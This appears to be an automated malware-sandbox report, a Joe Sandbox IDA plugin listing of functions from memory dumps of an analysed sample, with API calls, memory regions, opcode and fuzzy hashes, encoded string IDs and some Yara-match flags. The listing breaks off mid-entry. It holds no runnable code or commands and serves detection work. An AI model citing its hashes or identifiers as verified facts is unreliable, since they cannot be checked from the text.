                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                            Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                            • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                              • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                            • ___initconout.LIBCMT ref: 1000CD55
                                              • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                            • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                            Function 00409D0D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                            • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                            • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                            • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                            • String ID:
                                            • API String ID: 3269011525-0
                                            • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                            • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                            Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • _free.LIBCMT ref: 100067F1
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 10006804
                                            • _free.LIBCMT ref: 10006815
                                            • _free.LIBCMT ref: 10006826
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                            • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                            • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                            • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                            Function 00410EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                            Download Yara Rule
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00410F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction ID: 1dd945e64f0d07477a36e3934c2b0d008af5dc79b4df0e8c4bba017ec81d751d
                                            • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction Fuzzy Hash: 65512B75A0820296CB217714DA023EB6BA49B40750F618D6FF095463E9EBBCCCD7DA4E
                                            Function 00409590 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                            Download Yara Rule
                                            APIs
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                            • String ID: vector too long
                                            • API String ID: 3646673767-2873823879
                                            • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                            • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                            Function 04B3BA27 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04B3BA66
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 04B3BB1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: d46d4c7a77a2425fa856bb827c536819ff2905282fbc7d0684fd566d69809621
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 4941D330A04218ABCF10DF6AC884A9EBFB5FF44319F1481D5E814AB356DB75FA16CB91
                                            Function 04B3C2C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlEncodePointer.NTDLL(00000000), ref: 04B3C2EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: fcbe1ade2eebc8377b3bf13851ef41adcb22534d1920198d2d7fd1b0be4491c5
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: 99413772900209EFDF25CF99CD80AEEBBB5FF48305F148099E904B7221D335A960DB50
                                            Function 0040C060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                            Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                            • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                            Function 04B31567 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B315F3
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: KN$]DFE
                                            • API String ID: 4132704954-873640922
                                            • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction ID: 64122244aa6d14c71d0b99c1c336ccb2368583e332e92bbbfdefda2941a1d826
                                            • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction Fuzzy Hash: 57213AF0F00284CAE724DF69EC457A8B770EF19308F8483A5E4541B261DB7465C6CB5D
                                            Function 04CF0700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF078C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: KN$]DFE
                                            • API String ID: 1385522511-873640922
                                            • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction ID: 0053214b547fbc7882e5a47014abb901a50d454d7a7590eee5007d299fdef86c
                                            • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction Fuzzy Hash: A3215AF0F00684CAE720DF64EC457A8B761AF09308F44C2A5E5540B261EB7872C2DF5D
                                            Function 00401300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040138C
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: KN$]DFE
                                            • API String ID: 2296764815-873640922
                                            • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                            • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                            Function 04B38677 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B386E5
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction ID: 58bc2b20522d7a505f5f3ad564cbbd7a56f12507e4a02e337046c3c19a182e8f
                                            • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction Fuzzy Hash: 1401F970F04358DBD720FF7EAD41A5D73A0EB19612FA006A9D11457350DBB4B985C78A
                                            Function 04B380B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B38125
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction ID: c470636493ca13b4693f2841becd130eb35744f288b0df1f8917595570533e09
                                            • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction Fuzzy Hash: 3D0149B1F00218DFC720FF69FC41A6D73A0EB09200FA002A9E4195B350D77469958747
                                            Function 04CF7810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF787E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 1385522511-3597986494
                                            • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction ID: 76dc0a24593a9faf94cc8e6e1f45bdd86553922fdc90086fcffab0b60fb40bde
                                            • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction Fuzzy Hash: 0A01F970F042549BC720EFB8AD41F6D7362AB18315FA00279D71557290EB78B541DB99
                                            Function 04CF7250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF72BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 1385522511-3597986494
                                            • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction ID: 92b4dbfa11e40cbbe3f15e7114ff5953559e4fc7f519d1489ac64957b9161d3b
                                            • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction Fuzzy Hash: 7201F9B1F01248DFCB20EFA8AD41F7D7362AB19314FA00169EA195B290E7387541CB56
                                            Function 00408410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040847E
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                            • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                            Function 00407E50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407EBE
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
                                            • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                            Function 04B37A67 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B37AD0
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$EDO*
                                            • API String ID: 4132704954-3480089779
                                            • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction ID: fa8db8f361f1a550fdfca031d8093479c25c73c370b8a0e8d0597c2eca6c5bf3
                                            • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction Fuzzy Hash: 2A01F4B0F04208DBDB20DFAAE841E4CB7B0EB14705F9045BAC801973A0CA34BA07CF49
                                            Function 04B37B77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04B39EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EF7
                                              • Part of subcall function 04B39EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39F34
                                            • __Init_thread_footer.LIBCMT ref: 04B37BE0
                                              • Part of subcall function 04B39EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B39EAC
                                              • Part of subcall function 04B39EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B39EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$^]E*
                                            • API String ID: 4132704954-2708296792
                                            • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction ID: 9d72290ede996c8ec6165d48c187716137f7dd7e9043d3e62946011dfe20e66f
                                            • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction Fuzzy Hash: F401A4F0F00208DBD720DFAAE882A9D77B0E744705F9041FAE81557390DA75B985CF49
                                            Function 04CF6C00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                            • __Init_thread_footer.LIBCMT ref: 04CF6C69
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
